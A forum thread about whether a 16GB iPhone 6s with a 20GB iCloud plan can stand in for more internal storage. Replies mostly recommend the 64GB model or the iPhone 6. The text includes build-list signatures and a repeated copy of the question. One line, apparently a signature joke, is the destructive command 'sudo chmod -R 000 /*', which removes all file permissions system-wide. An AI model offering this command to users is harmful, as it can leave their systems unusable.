iPhone 6s: 16gb and 20gb iCloud?

Hey the new iPhone was just announced and I want to get it but the price seems a bit too much. It's my first iPhone so I wanted to know some things. How does I cloud work? Can I get a 16gb iphone and get the 20gb iCloud package, and it will be like hypothetically having 36gb of memory? I know it won't save apps like games but it will save everythin else? Won't really put high memory apps on it really but lets say I record a long 4k video and it's almost a gb. Will that save all to icloud or phone AND icloud? Thanks . And if so, do u recommend the 20gb or the higher one? Or should i just get the 64gb iPhone? Heard it will take time to download files like the 4k video but my wifi speed is pretty fast (60down and 10up) Thanks.

I definitely don't recommend getting 16gbs and just sticking with apples memory options and not make use of i cloud as much.

In my experience icloud is a pain 

The price IS too high if you ask me. Cloud storage is nothing new and is available on android devices too - except for that price they give you a lot more than 16gb of internal storage (which is ridiculous at this stage). Also, getting a higher capacity model deifnitely isn't worth 100+$ more.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

I'd recommend the 64GB as a minimum with the iPhone, if the 6S is too much just go for the 6 as that's dropped in price and is still outstanding. Cloud storage is good for photos and videos, but you'll run out of space for apps very quickly due to how much room iOS takes up and having no expandable storage.

PCs

Spoiler
Spoiler

Branwen (2015 build) - CPU: i7 4790K GPU:EVGA GTX 1070 SC PSU: XFX XTR 650W RAM: 16GB Kingston HyperX fury Motherboard: MSI Z87 MPower MAX AC SSD: Crucial MX100 256GB + Crucial MX300 1TB  Case: Silverstone RV05 Cooler: Corsair H80i V2 Displays: AOC AGON AG241QG & BenQ BL2420PT Build log: link 

Spoiler

Netrunner (2020 build) - CPU: AMD R7 3700X GPU: EVGA GTX 1070 (from 2015 build) PSU: Corsair SF600 platinum RAM: 32GB Crucial Ballistix RGB 3600Mhz cl16 Motherboard: Gigabyte Aorus X570i pro wifi SSD: Sabrent Rocket 4.0 1TB Case: Lian Li TU150W black Cooler: Be Quiet! Dark Rock Slim

Hey the new iPhone was just announced and I want to get it but the price seems a bit too much. It's my first iPhone so I wanted to know some things. How does I cloud work? Can I get a 16gb iphone and get the 20gb iCloud package, and it will be like hypothetically having 36gb of memory? I know it won't save apps like games but it will save everythin else? Won't really put high memory apps on it really but lets say I record a long 4k video and it's almost a gb. Will that save all to icloud or phone AND icloud? Thanks . And if so, do u recommend the 20gb or the higher one? Or should i just get the 64gb iPhone? Heard it will take time to download files like the 4k video but my wifi speed is pretty fast (60down and 10up) Thanks.

Icloud is not like an external hard drive for games and such only really for music and photos. I really dont think that the new iPhone is worth getting because they really didnt change anything that is necessary.